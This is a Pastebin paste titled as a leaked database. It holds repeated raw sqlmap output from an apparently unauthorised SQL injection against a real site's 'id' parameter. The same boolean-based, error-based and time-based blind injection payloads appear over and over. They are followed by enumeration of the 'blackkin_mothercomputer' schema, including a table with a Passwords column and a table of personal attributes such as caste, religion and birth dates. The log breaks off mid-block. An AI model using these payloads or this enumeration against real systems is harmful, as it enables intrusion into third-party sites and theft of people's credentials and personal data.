Advertisement
Guest User

Blackkingdom database leaked

a guest
Apr 10th, 2016
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.41 KB | None | 0 0
  1. sqlmap identified the following injection point(s) with a total of 199 HTTP(s) requests:
  2. ---
  3. Parameter: id (GET)
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  7.  
  8. Type: error-based
  9. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  10. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  11.  
  12. Type: AND/OR time-based blind
  13. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  14. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  15. ---
  16. web application technology: Apache, PHP 5.4.39
  17. back-end DBMS: MySQL 5.0
  18. sqlmap resumed the following injection point(s) from stored session:
  19. ---
  20. Parameter: id (GET)
  21. Type: boolean-based blind
  22. Title: AND boolean-based blind - WHERE or HAVING clause
  23. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  24.  
  25. Type: error-based
  26. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  27. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  28.  
  29. Type: AND/OR time-based blind
  30. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  31. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  32. ---
  33. web application technology: Apache, PHP 5.4.39
  34. back-end DBMS: MySQL 5.0
  35. available databases [2]:
  36. [*] blackkin_mothercomputer
  37. [*] information_schema
  38.  
  39. sqlmap resumed the following injection point(s) from stored session:
  40. ---
  41. Parameter: id (GET)
  42. Type: boolean-based blind
  43. Title: AND boolean-based blind - WHERE or HAVING clause
  44. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  45.  
  46. Type: error-based
  47. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  48. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  49.  
  50. Type: AND/OR time-based blind
  51. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  52. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  53. ---
  54. web application technology: Apache, PHP 5.4.39
  55. back-end DBMS: MySQL 5.0
  56. Database: blackkin_mothercomputer
  57. Table: Human_MailID
  58. [5 columns]
  59. +-----------+--------------+
  60. | Column | Type |
  61. +-----------+--------------+
  62. | Human_ID | int(11) |
  63. | ID | int(11) |
  64. | MailID | varchar(500) |
  65. | Passwords | varchar(500) |
  66. | Verified | bit(1) |
  67. +-----------+--------------+
  68.  
  69. Database: blackkin_mothercomputer
  70. Table: Review
  71. [5 columns]
  72. +------------+---------------+
  73. | Column | Type |
  74. +------------+---------------+
  75. | Agree | double |
  76. | DontAgree | double |
  77. | ID | int(11) |
  78. | Review | varchar(1000) |
  79. | SoftwareID | int(11) |
  80. +------------+---------------+
  81.  
  82. Database: blackkin_mothercomputer
  83. Table: Web_Hosting
  84. [19 columns]
  85. +--------------+--------------+
  86. | Column | Type |
  87. +--------------+--------------+
  88. | Address | varchar(500) |
  89. | Area | varchar(500) |
  90. | CompanyName | varchar(500) |
  91. | ContactNo1 | varchar(500) |
  92. | ContactNo2 | varchar(500) |
  93. | Country | varchar(500) |
  94. | Dates | date |
  95. | DiskSizetype | varchar(10) |
  96. | DiskSpace | int(11) |
  97. | District | varchar(500) |
  98. | DomainName | varchar(500) |
  99. | DomainNeedTo | varchar(10) |
  100. | Email | varchar(500) |
  101. | FAX | varchar(500) |
  102. | ID | int(11) |
  103. | Name | varchar(500) |
  104. | Pincode | varchar(500) |
  105. | State | varchar(500) |
  106. | Status | varchar(500) |
  107. +--------------+--------------+
  108.  
  109. Database: blackkin_mothercomputer
  110. Table: Human
  111. [29 columns]
  112. +-----------------+---------------+
  113. | Column | Type |
  114. +-----------------+---------------+
  115. | ApproximateAge | int(11) |
  116. | Birth_Date | int(11) |
  117. | Birth_Month | varchar(10) |
  118. | Birth_Year | int(11) |
  119. | BloodGroup | varchar(50) |
  120. | Caste | varchar(500) |
  121. | Death_Date | int(11) |
  122. | Death_Month | varchar(10) |
  123. | Death_Year | int(11) |
  124. | Eye_Color | varchar(50) |
  125. | FamilyName | varchar(500) |
  126. | Father_Human_ID | int(11) |
  127. | FirstMeet | varchar(1000) |
  128. | Full_First_Name | varchar(500) |
  129. | Gender | varchar(7) |
  130. | Hair_Color | varchar(50) |
  131. | Height | double |
  132. | Human_ID | int(11) |
  133. | Last_Name | varchar(500) |
  134. | Middle_Name | varchar(500) |
  135. | Mother_Human_ID | int(11) |
  136. | MotherTounge | varchar(1000) |
  137. | Name_Initial | varchar(500) |
  138. | Nationality | varchar(1000) |
  139. | Nick_Name | varchar(500) |
  140. | Picture | varchar(1000) |
  141. | Religion | varchar(500) |
  142. | SoulName | varchar(500) |
  143. | Weight | double |
  144. +-----------------+---------------+
  145.  
  146. Database: blackkin_mothercomputer
  147. Table: Human_Contact_No
  148. [3 columns]
  149. +-----------+--------------+
  150. | Column | Type |
  151. +-----------+--------------+
  152. | ContactNo | varchar(500) |
  153. | Human_ID | int(11) |
  154. | ID | int(11) |
  155. +-----------+--------------+
  156.  
  157. Database: blackkin_mothercomputer
  158. Table: Software
  159. [10 columns]
  160. +--------------+---------------+
  161. | Column | Type |
  162. +--------------+---------------+
  163. | Description | varchar(1000) |
  164. | DownloadLink | varchar(1000) |
  165. | ID | int(11) |
  166. | Image | varchar(1000) |
  167. | Name | varchar(500) |
  168. | Star1 | double |
  169. | Star2 | double |
  170. | Star3 | double |
  171. | Star4 | double |
  172. | Star5 | double |
  173. +--------------+---------------+
  174.  
  175. sqlmap resumed the following injection point(s) from stored session:
  176. ---
  177. Parameter: id (GET)
  178. Type: boolean-based blind
  179. Title: AND boolean-based blind - WHERE or HAVING clause
  180. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  181.  
  182. Type: error-based
  183. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  184. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  185.  
  186. Type: AND/OR time-based blind
  187. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  188. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  189. ---
  190. web application technology: Apache, PHP 5.4.39
  191. back-end DBMS: MySQL 5.0
  192. No tables found
  193. sqlmap resumed the following injection point(s) from stored session:
  194. ---
  195. Parameter: id (GET)
  196. Type: boolean-based blind
  197. Title: AND boolean-based blind - WHERE or HAVING clause
  198. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  199.  
  200. Type: error-based
  201. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  202. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  203.  
  204. Type: AND/OR time-based blind
  205. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  206. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  207. ---
  208. web application technology: Apache, PHP 5.4.39
  209. back-end DBMS: MySQL 5.0
  210. No tables found
  211. sqlmap resumed the following injection point(s) from stored session:
  212. ---
  213. Parameter: id (GET)
  214. Type: boolean-based blind
  215. Title: AND boolean-based blind - WHERE or HAVING clause
  216. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  217.  
  218. Type: error-based
  219. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  220. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  221.  
  222. Type: AND/OR time-based blind
  223. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  224. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  225. ---
  226. web application technology: Apache, PHP 5.4.39
  227. back-end DBMS: MySQL 5.0
  228. sqlmap resumed the following injection point(s) from stored session:
  229. ---
  230. Parameter: id (GET)
  231. Type: boolean-based blind
  232. Title: AND boolean-based blind - WHERE or HAVING clause
  233. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  234.  
  235. Type: error-based
  236. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  237. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  238.  
  239. Type: AND/OR time-based blind
  240. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  241. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  242. ---
  243. web application technology: Apache, PHP 5.4.39
  244. back-end DBMS: MySQL 5.0
  245. Database: blackkin_mothercomputer
  246. Table: Human_MailID
  247. [5 columns]
  248. +-----------+--------------+
  249. | Column | Type |
  250. +-----------+--------------+
  251. | Human_ID | int(11) |
  252. | ID | int(11) |
  253. | MailID | varchar(500) |
  254. | Passwords | varchar(500) |
  255. | Verified | bit(1) |
  256. +-----------+--------------+
  257.  
  258. sqlmap resumed the following injection point(s) from stored session:
  259. ---
  260. Parameter: id (GET)
  261. Type: boolean-based blind
  262. Title: AND boolean-based blind - WHERE or HAVING clause
  263. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  264.  
  265. Type: error-based
  266. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  267. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  268.  
  269. Type: AND/OR time-based blind
  270. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  271. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  272. ---
  273. web application technology: Apache, PHP 5.4.39
  274. back-end DBMS: MySQL 5.0
  275. Database: blackkin_mothercomputer
  276. Table: Human_MailID
  277. [1 column]
  278. +-----------+--------------+
  279. | Column | Type |
  280. +-----------+--------------+
  281. | Passwords | varchar(500) |
  282. +-----------+--------------+
  283.  
  284. sqlmap resumed the following injection point(s) from stored session:
  285. ---
  286. Parameter: id (GET)
  287. Type: boolean-based blind
  288. Title: AND boolean-based blind - WHERE or HAVING clause
  289. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  290.  
  291. Type: error-based
  292. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  293. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  294.  
  295. Type: AND/OR time-based blind
  296. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  297. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  298. ---
  299. web application technology: Apache, PHP 5.4.39
  300. back-end DBMS: MySQL 5.0
  301. Database: blackkin_mothercomputer
  302. Table: Human_MailID
  303. [1 column]
  304. +-----------+--------------+
  305. | Column | Type |
  306. +-----------+--------------+
  307. | Passwords | varchar(500) |
  308. +-----------+--------------+
  309.  
  310. sqlmap resumed the following injection point(s) from stored session:
  311. ---
  312. Parameter: id (GET)
  313. Type: boolean-based blind
  314. Title: AND boolean-based blind - WHERE or HAVING clause
  315. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  316.  
  317. Type: error-based
  318. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  319. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  320.  
  321. Type: AND/OR time-based blind
  322. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  323. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  324. ---
  325. web application technology: Apache, PHP 5.4.39
  326. back-end DBMS: MySQL 5.0
  327. sqlmap resumed the following injection point(s) from stored session:
  328. ---
  329. Parameter: id (GET)
  330. Type: boolean-based blind
  331. Title: AND boolean-based blind - WHERE or HAVING clause
  332. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  333.  
  334. Type: error-based
  335. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  336. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  337.  
  338. Type: AND/OR time-based blind
  339. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  340. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  341. ---
  342. web application technology: Apache, PHP 5.4.39
  343. back-end DBMS: MySQL 5.0
  344. sqlmap resumed the following injection point(s) from stored session:
  345. ---
  346. Parameter: id (GET)
  347. Type: boolean-based blind
  348. Title: AND boolean-based blind - WHERE or HAVING clause
  349. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  350.  
  351. Type: error-based
  352. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  353. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  354.  
  355. Type: AND/OR time-based blind
  356. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  357. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  358. ---
  359. web application technology: Apache, PHP 5.4.39
  360. back-end DBMS: MySQL 5.0
  361. Database: blackkin_mothercomputer
  362. Table: Human_MailID
  363. [5 columns]
  364. +-----------+--------------+
  365. | Column | Type |
  366. +-----------+--------------+
  367. | Human_ID | int(11) |
  368. | ID | int(11) |
  369. | MailID | varchar(500) |
  370. | Passwords | varchar(500) |
  371. | Verified | bit(1) |
  372. +-----------+--------------+
  373.  
  374. sqlmap resumed the following injection point(s) from stored session:
  375. ---
  376. Parameter: id (GET)
  377. Type: boolean-based blind
  378. Title: AND boolean-based blind - WHERE or HAVING clause
  379. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  380.  
  381. Type: error-based
  382. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  383. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  384.  
  385. Type: AND/OR time-based blind
  386. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  387. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  388. ---
  389. web application technology: Apache, PHP 5.4.39
  390. back-end DBMS: MySQL 5.0
  391. sqlmap resumed the following injection point(s) from stored session:
  392. ---
  393. Parameter: id (GET)
  394. Type: boolean-based blind
  395. Title: AND boolean-based blind - WHERE or HAVING clause
  396. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  397.  
  398. Type: error-based
  399. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  400. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  401.  
  402. Type: AND/OR time-based blind
  403. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  404. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  405. ---
  406. web application technology: Apache, PHP 5.4.39
  407. back-end DBMS: MySQL 5.0
  408. Database: blackkin_mothercomputer
  409. Table: Human_MailID
  410. [5 columns]
  411. +-----------+--------------+
  412. | Column | Type |
  413. +-----------+--------------+
  414. | Human_ID | int(11) |
  415. | ID | int(11) |
  416. | MailID | varchar(500) |
  417. | Passwords | varchar(500) |
  418. | Verified | bit(1) |
  419. +-----------+--------------+
  420.  
  421. sqlmap resumed the following injection point(s) from stored session:
  422. ---
  423. Parameter: id (GET)
  424. Type: boolean-based blind
  425. Title: AND boolean-based blind - WHERE or HAVING clause
  426. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  427.  
  428. Type: error-based
  429. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  430. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  431.  
  432. Type: AND/OR time-based blind
  433. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  434. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  435. ---
  436. web application technology: Apache, PHP 5.4.39
  437. back-end DBMS: MySQL 5.0
  438. sqlmap resumed the following injection point(s) from stored session:
  439. ---
  440. Parameter: id (GET)
  441. Type: boolean-based blind
  442. Title: AND boolean-based blind - WHERE or HAVING clause
  443. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  444.  
  445. Type: error-based
  446. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  447. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  448.  
  449. Type: AND/OR time-based blind
  450. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  451. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  452. ---
  453. web application technology: Apache, PHP 5.4.39
  454. back-end DBMS: MySQL 5.0
  455. Database: blackkin_mothercomputer
  456. Table: Human_MailID
  457. [5 columns]
  458. +-----------+--------------+
  459. | Column | Type |
  460. +-----------+--------------+
  461. | Human_ID | int(11) |
  462. | ID | int(11) |
  463. | MailID | varchar(500) |
  464. | Passwords | varchar(500) |
  465. | Verified | bit(1) |
  466. +-----------+--------------+
  467.  
  468. sqlmap resumed the following injection point(s) from stored session:
  469. ---
  470. Parameter: id (GET)
  471. Type: boolean-based blind
  472. Title: AND boolean-based blind - WHERE or HAVING clause
  473. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  474.  
  475. Type: error-based
  476. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  477. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  478.  
  479. Type: AND/OR time-based blind
  480. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  481. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  482. ---
  483. web application technology: Apache, PHP 5.4.39
  484. back-end DBMS: MySQL 5.0
  485. Database: blackkin_mothercomputer
  486. Table: Human_MailID
  487. [5 columns]
  488. +-----------+--------------+
  489. | Column | Type |
  490. +-----------+--------------+
  491. | Human_ID | int(11) |
  492. | ID | int(11) |
  493. | MailID | varchar(500) |
  494. | Passwords | varchar(500) |
  495. | Verified | bit(1) |
  496. +-----------+--------------+
  497.  
  498. sqlmap resumed the following injection point(s) from stored session:
  499. ---
  500. Parameter: id (GET)
  501. Type: boolean-based blind
  502. Title: AND boolean-based blind - WHERE or HAVING clause
  503. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  504.  
  505. Type: error-based
  506. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  507. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  508.  
  509. Type: AND/OR time-based blind
  510. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  511. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  512. ---
  513. web application technology: Apache, PHP 5.4.39
  514. back-end DBMS: MySQL 5.0
  515. Database: blackkin_mothercomputer
  516. [6 tables]
  517. +------------------+
  518. | Human |
  519. | Human_Contact_No |
  520. | Human_MailID |
  521. | Review |
  522. | Software |
  523. | Web_Hosting |
  524. +------------------+
  525.  
  526. Database: blackkin_mothercomputer
  527. Table: Human_MailID
  528. [5 columns]
  529. +-----------+--------------+
  530. | Column | Type |
  531. +-----------+--------------+
  532. | Human_ID | int(11) |
  533. | ID | int(11) |
  534. | MailID | varchar(500) |
  535. | Passwords | varchar(500) |
  536. | Verified | bit(1) |
  537. +-----------+--------------+
  538.  
  539. Database: blackkin_mothercomputer
  540. Table: Review
  541. [5 columns]
  542. +------------+---------------+
  543. | Column | Type |
  544. +------------+---------------+
  545. | Agree | double |
  546. | DontAgree | double |
  547. | ID | int(11) |
  548. | Review | varchar(1000) |
  549. | SoftwareID | int(11) |
  550. +------------+---------------+
  551.  
  552. Database: blackkin_mothercomputer
  553. Table: Web_Hosting
  554. [19 columns]
  555. +--------------+--------------+
  556. | Column | Type |
  557. +--------------+--------------+
  558. | Address | varchar(500) |
  559. | Area | varchar(500) |
  560. | CompanyName | varchar(500) |
  561. | ContactNo1 | varchar(500) |
  562. | ContactNo2 | varchar(500) |
  563. | Country | varchar(500) |
  564. | Dates | date |
  565. | DiskSizetype | varchar(10) |
  566. | DiskSpace | int(11) |
  567. | District | varchar(500) |
  568. | DomainName | varchar(500) |
  569. | DomainNeedTo | varchar(10) |
  570. | Email | varchar(500) |
  571. | FAX | varchar(500) |
  572. | ID | int(11) |
  573. | Name | varchar(500) |
  574. | Pincode | varchar(500) |
  575. | State | varchar(500) |
  576. | Status | varchar(500) |
  577. +--------------+--------------+
  578.  
  579. Database: blackkin_mothercomputer
  580. Table: Human
  581. [29 columns]
  582. +-----------------+---------------+
  583. | Column | Type |
  584. +-----------------+---------------+
  585. | ApproximateAge | int(11) |
  586. | Birth_Date | int(11) |
  587. | Birth_Month | varchar(10) |
  588. | Birth_Year | int(11) |
  589. | BloodGroup | varchar(50) |
  590. | Caste | varchar(500) |
  591. | Death_Date | int(11) |
  592. | Death_Month | varchar(10) |
  593. | Death_Year | int(11) |
  594. | Eye_Color | varchar(50) |
  595. | FamilyName | varchar(500) |
  596. | Father_Human_ID | int(11) |
  597. | FirstMeet | varchar(1000) |
  598. | Full_First_Name | varchar(500) |
  599. | Gender | varchar(7) |
  600. | Hair_Color | varchar(50) |
  601. | Height | double |
  602. | Human_ID | int(11) |
  603. | Last_Name | varchar(500) |
  604. | Middle_Name | varchar(500) |
  605. | Mother_Human_ID | int(11) |
  606. | MotherTounge | varchar(1000) |
  607. | Name_Initial | varchar(500) |
  608. | Nationality | varchar(1000) |
  609. | Nick_Name | varchar(500) |
  610. | Picture | varchar(1000) |
  611. | Religion | varchar(500) |
  612. | SoulName | varchar(500) |
  613. | Weight | double |
  614. +-----------------+---------------+
  615.  
  616. Database: blackkin_mothercomputer
  617. Table: Human_Contact_No
  618. [3 columns]
  619. +-----------+--------------+
  620. | Column | Type |
  621. +-----------+--------------+
  622. | ContactNo | varchar(500) |
  623. | Human_ID | int(11) |
  624. | ID | int(11) |
  625. +-----------+--------------+
  626.  
  627. Database: blackkin_mothercomputer
  628. Table: Software
  629. [10 columns]
  630. +--------------+---------------+
  631. | Column | Type |
  632. +--------------+---------------+
  633. | Description | varchar(1000) |
  634. | DownloadLink | varchar(1000) |
  635. | ID | int(11) |
  636. | Image | varchar(1000) |
  637. | Name | varchar(500) |
  638. | Star1 | double |
  639. | Star2 | double |
  640. | Star3 | double |
  641. | Star4 | double |
  642. | Star5 | double |
  643. +--------------+---------------+
  644.  
  645. sqlmap resumed the following injection point(s) from stored session:
  646. ---
  647. Parameter: id (GET)
  648. Type: boolean-based blind
  649. Title: AND boolean-based blind - WHERE or HAVING clause
  650. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  651.  
  652. Type: error-based
  653. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  654. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  655.  
  656. Type: AND/OR time-based blind
  657. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  658. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  659. ---
  660. web application technology: Apache, PHP 5.4.39
  661. back-end DBMS: MySQL 5.0
  662. sqlmap resumed the following injection point(s) from stored session:
  663. ---
  664. Parameter: id (GET)
  665. Type: boolean-based blind
  666. Title: AND boolean-based blind - WHERE or HAVING clause
  667. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  668.  
  669. Type: error-based
  670. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  671. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  672.  
  673. Type: AND/OR time-based blind
  674. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  675. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  676. ---
  677. web application technology: Apache, PHP 5.4.39
  678. back-end DBMS: MySQL 5.0
  679. Database: blackkin_mothercomputer
  680. Table: Human_MailID
  681. [5 columns]
  682. +-----------+--------------+
  683. | Column | Type |
  684. +-----------+--------------+
  685. | Human_ID | int(11) |
  686. | ID | int(11) |
  687. | MailID | varchar(500) |
  688. | Passwords | varchar(500) |
  689. | Verified | bit(1) |
  690. +-----------+--------------+
  691.  
  692. sqlmap resumed the following injection point(s) from stored session:
  693. ---
  694. Parameter: id (GET)
  695. Type: boolean-based blind
  696. Title: AND boolean-based blind - WHERE or HAVING clause
  697. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  698.  
  699. Type: error-based
  700. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
